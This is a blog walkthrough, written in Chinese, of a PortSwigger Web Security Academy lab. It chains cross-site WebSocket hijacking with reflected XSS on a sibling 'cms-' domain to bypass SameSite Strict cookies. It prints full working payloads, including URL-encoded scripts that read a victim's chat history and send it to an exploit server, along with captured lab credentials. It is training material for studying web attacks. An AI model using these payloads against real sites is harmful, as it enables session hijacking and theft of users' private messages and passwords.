某不知名博客
carsaid
2023-10-06
目录

从业者-SameSite Strict绕过-易受攻击的同级域

# 实验室:SameSite Strict绕过-易受攻击的同级域

# 题目

此实验室的 实时聊天功能 容易受到跨站点WebSocket劫持(CSWSH) (opens new window)的攻击。若要解决实验室问题,请登录受害者的帐户。

为此,请使用提供的漏洞利用服务器来执行 CSWSH 攻击,将受害者的聊天记录泄露到默认的 Burp Collaborator 服务器。聊天历史记录中包含纯文本形式的登录凭据。

如果你尚未执行此主题,我们建议在尝试本实验之前完成有关WebSocket漏洞 (opens new window)的主题。

提示

请确保你完全审查了所有可用的攻击面。请留意可能有助于你进行攻击的其他漏洞,并记住同一站点内可能存在两个域。

实验室-从业者

SameSite Strict绕过-易受攻击的同级域 >>

- name: 实验室-从业者
  desc: SameSite Strict绕过-易受攻击的同级域 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-sibling-domain
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image

(如果你还未完成 WebSockets 主题的学习,请先去学完,然后再回到这个实验室来)

# 发现跨站点WebSockets劫持攻击

根据 WebSockets 主题中的实操经验,先启用 BurpSuite 代理,然后点击 “Live chat” 进入聊天室。

Not Found Image

成功捕获了 WebSockets 的握手数据包,可以看到数据包中不包含任何 CSRF 防护措施,存在跨站点 WebSockets 劫持攻击。

Not Found Image

还捕获了相应 WebSockets 连接的消息。

Not Found Image

根据 WebSockets 主题中的经验,在漏洞利用服务器上保存以下载荷:

<script>
  var ws = new WebSocket('wss://<目标站点>/chat');
  ws.onopen = function (event) {
    ws.send('READY');
  }

  ws.onmessage = function (event) {
    console.log(event.data);
  }
</script>
1
2
3
4
5
6
7
8
9
10

这将从攻击域建立 与 受损站点的 WebSockets 连接。

Not Found Image

成功收到来自受损站点的 WebSockets 消息。

控制台有一条警告信息很突兀:由于是在...已拒绝 Cookie。意思是说,受损站点存在 SameSite 策略,你建立的 WebSockets 连接不会包含受损站点的 Cookie。

你有 Cookie,所以人家才会发送你的聊天记录给你。受害用户也一样,如果没有 Cookie,就不会有相应的聊天记录。

Not Found Image

查看产生的握手数据包,确实不包含 Cookie。

Not Found Image

# 发现XSS漏洞,配合WebSockets劫持形成组合拳

根据题目中的提示,貌似存在 XSS 漏洞?

尝试通过 WebSockets 消息注入 XSS 载荷,被过滤。

Not Found Image

然后我逛着逛着,只看到一个登录表单......表单?

Not Found Image

反手一个参数预填充,漂亮。

"><img src=1 onerror=alert(5)>

/login?username=abc"><img src=1 onerror=alert(5)>
1
2
3
Not Found Image

这是一个经典的跨站点 WebSockets 劫持攻击的载荷,但是去除了所有的换行,并做了一些小处理:

"><script>var ws=new WebSocket('wss://<目标站点>/chat');ws.onopen=function(event){ws.send('READY')};ws.onmessage=function(event){var xhr=new XMLHttpRequest();xhr.open('get','https://<漏洞利用服务器>/log?data='+encodeURIComponent(event.data),true);xhr.send()}</script>
1

填写相应的域名,然后对以上载荷进行 URL 编码,通过表单预填充注入到username参数中:

/login?username=abc%22%3e%3c%73%63%72%69%70%74%3e%76%61%72%20%77%73%3d%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%27%77%73%73%3a%2f%2f%30%61%34%32%30%30%61%63%30%34%64%30%37%31%65%66%38%34%39%63%33%37%30%36%30%30%34%65%30%30%38%33%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%27%29%3b%77%73%2e%6f%6e%6f%70%65%6e%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%77%73%2e%73%65%6e%64%28%27%52%45%41%44%59%27%29%7d%3b%77%73%2e%6f%6e%6d%65%73%73%61%67%65%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%76%61%72%20%78%68%72%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%78%68%72%2e%6f%70%65%6e%28%27%67%65%74%27%2c%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%61%64%30%30%31%30%30%34%31%64%37%31%36%39%38%34%33%35%33%36%36%66%30%31%39%30%30%30%61%33%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%64%61%74%61%3d%27%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%65%76%65%6e%74%2e%64%61%74%61%29%2c%74%72%75%65%29%3b%78%68%72%2e%73%65%6e%64%28%29%7d%3c%2f%73%63%72%69%70%74%3e
1

这将在目标域上,触发对自己的 WebSockets 攻击。

可以看到,成功捕获了大量聊天记录。

Not Found Image

捕获成功。

Not Found Image

# 发现同级域

根据题目中的提示,应该还有一个同级的域才对。但是我翻遍了网站,就是找不到......

于是我瞄了一小眼答案:当你加载图像或 js 等资源时,会在响应标头Access-Control-Allow-Origin中看到另一个域名???

图像资源???BurpSuite 默认不保留这类数据包的历史记录......再加上浏览器有缓存,只会在最开始加载一次,后续全都看不到了......

于是我把浏览器缓存清除了,刷新了网站首页。好嘛,藏得这么深:

https://cms-<目标站点>/
1
Not Found Image

访问看看,一个简易版的登录表单。

Not Found Image

可以 POST 提交表单,你所提交的username参数将会被包含在即时响应当中......包含在即时响应当中?

Not Found Image

反手一个 GET 提交表单,漂亮。

/login?username=abc<img src=1 onerror=alert(5)>&password=123
1
Not Found Image

原本,如果只有一个域,我们可以这样--将用户重定向到存在 XSS 漏洞的页面:

<script>window.location="https://0a4200ac04d071ef849c3706004e0083.web-security-academy.net/login?username=abc%22%3e%3c%73%63%72%69%70%74%3e%76%61%72%20%77%73%3d%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%27%77%73%73%3a%2f%2f%30%61%34%32%30%30%61%63%30%34%64%30%37%31%65%66%38%34%39%63%33%37%30%36%30%30%34%65%30%30%38%33%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%27%29%3b%77%73%2e%6f%6e%6f%70%65%6e%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%77%73%2e%73%65%6e%64%28%27%52%45%41%44%59%27%29%7d%3b%77%73%2e%6f%6e%6d%65%73%73%61%67%65%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%76%61%72%20%78%68%72%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%78%68%72%2e%6f%70%65%6e%28%27%67%65%74%27%2c%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%61%64%30%30%31%30%30%34%31%64%37%31%36%39%38%34%33%35%33%36%36%66%30%31%39%30%30%30%61%33%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%64%61%74%61%3d%27%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%65%76%65%6e%74%2e%64%61%74%61%29%2c%74%72%75%65%29%3b%78%68%72%2e%73%65%6e%64%28%29%7d%3c%2f%73%63%72%69%70%74%3e";</script>
1

而现在--将用户重定向到同级域的 XSS 页面,然后通过同级域的 XSS 再将用户重定向到主域的 XSS 页面:

这样才能绕过 SameSite 策略(后来我看了答案,发现直接在同级域上面运行攻击载荷就行,不用跳转到主域)。

<script>
  window.location = "https://cms-0a4200ac04d071ef849c3706004e0083.web-security-academy.net/login?username=abc%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%20%3d%20%22%68%74%74%70%73%3a%2f%2f%30%61%34%32%30%30%61%63%30%34%64%30%37%31%65%66%38%34%39%63%33%37%30%36%30%30%34%65%30%30%38%33%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%6c%6f%67%69%6e%3f%75%73%65%72%6e%61%6d%65%3d%61%62%63%25%32%32%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%37%36%25%36%31%25%37%32%25%32%30%25%37%37%25%37%33%25%33%64%25%36%65%25%36%35%25%37%37%25%32%30%25%35%37%25%36%35%25%36%32%25%35%33%25%36%66%25%36%33%25%36%62%25%36%35%25%37%34%25%32%38%25%32%37%25%37%37%25%37%33%25%37%33%25%33%61%25%32%66%25%32%66%25%33%30%25%36%31%25%33%34%25%33%32%25%33%30%25%33%30%25%36%31%25%36%33%25%33%30%25%33%34%25%36%34%25%33%30%25%33%37%25%33%31%25%36%35%25%36%36%25%33%38%25%33%34%25%33%39%25%36%33%25%33%33%25%33%37%25%33%30%25%33%36%25%33%30%25%33%30%25%33%34%25%36%35%25%33%30%25%33%30%25%33%38%25%33%33%25%32%65%25%37%37%25%36%35%25%36%32%25%32%64%25%37%33%25%36%35%25%36%33%25%37%35%25%37%32%25%36%39%25%37%34%25%37%39%25%32%64%25%36%31%25%36%33%25%36%31%25%36%34%25%36%35%25%36%64%25%37%39%25%32%65%25%36%65%25%36%35%25%37%34%25%32%66%25%36%33%25%36%38%25%36%31%25%37%34%25%32%37%25%32%39%25%33%62%25%37%37%25%37%33%25%32%65%25%36%66%25%36%65%25%36%66%25%37%30%25%36%35%25%36%65%25%33%64%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%38%25%36%35%25%37%36%25%36%35%25%36%65%25%37%34%25%32%39%25%37%62%25%37%37%25%37%33%25%32%65%25%37%33%25%36%35%25%36%65%25%36%34%25%32%38%25%32%37%25%35%32%25%34%35%25%34%31%25%34%34%25%35%39%25%32%37%25%32%39%25%37%64%25%33%62%25%37%37%25%37%33%25%32%65%25%36%66%25%36%65%25%36%64%25%36%35%25%37%33%25%37%33%25%36%31%25%36%37%25%36%35%25%33%64%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%38%25%36%35%25%37%36%25%36%35%25%36%65%25%37%34%25%32%39%25%37%62%25%37%36%25%36%31%25%37%32%25%32%30%25%37%38%25%36%38%25%37%32%25%33%64%25%36%65%25%36%35%25%37%37%25%32%30%25%35%38%25%34%64%25%34%63%25%34%38%25%37%34%25%37%34%25%37%30%25%35%32%25%36%35%25%37%31%25%37%35%25%36%35%25%37%33%25%37%34%25%32%38%25%32%39%25%33%62%25%37%38%25%36%38%25%37%32%25%32%65%25%36%66%25%37%30%25%36%35%25%36%65%25%32%38%25%32%37%25%36%37%25%36%35%25%37%34%25%32%37%25%32%63%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%61%25%32%66%25%32%66%25%36%35%25%37%38%25%37%30%25%36%63%25%36%66%25%36%39%25%37%34%25%32%64%25%33%30%25%36%31%25%36%31%25%36%34%25%33%30%25%33%30%25%33%31%25%33%30%25%33%30%25%33%34%25%33%31%25%36%34%25%33%37%25%33%31%25%33%36%25%33%39%25%33%38%25%33%34%25%33%33%25%33%35%25%33%33%25%33%36%25%33%36%25%36%36%25%33%30%25%33%31%25%33%39%25%33%30%25%33%30%25%33%30%25%36%31%25%33%33%25%32%65%25%36%35%25%37%38%25%37%30%25%36%63%25%36%66%25%36%39%25%37%34%25%32%64%25%37%33%25%36%35%25%37%32%25%37%36%25%36%35%25%37%32%25%32%65%25%36%65%25%36%35%25%37%34%25%32%66%25%36%63%25%36%66%25%36%37%25%33%66%25%36%34%25%36%31%25%37%34%25%36%31%25%33%64%25%32%37%25%32%62%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%35%35%25%35%32%25%34%39%25%34%33%25%36%66%25%36%64%25%37%30%25%36%66%25%36%65%25%36%35%25%36%65%25%37%34%25%32%38%25%36%35%25%37%36%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%31%25%37%34%25%36%31%25%32%39%25%32%63%25%37%34%25%37%32%25%37%35%25%36%35%25%32%39%25%33%62%25%37%38%25%36%38%25%37%32%25%32%65%25%37%33%25%36%35%25%36%65%25%36%34%25%32%38%25%32%39%25%37%64%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%22%3b%3c%2f%73%63%72%69%70%74%3e&password=123";
</script>
1
2
3

保存载荷。

Not Found Image

以下动图演示了攻击过程:

Not Found Image

将载荷发送给受害用户,等待一会后,成功捕获到受害用户的聊天记录。

其中包含用户名carlos和密码5lx879bsbzdka1bqww62

Not Found Image

访问登录界面,使用捕获到的用户名和密码进行登录。

Not Found Image

登录成功,实验完成。

Not Found Image
编辑 (opens new window)
从业者-SameSite Strict绕过-客户端重定向
从业者-SameSite Lax绕过-Cookie刷新

从业者-SameSite Lax绕过-Cookie刷新

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License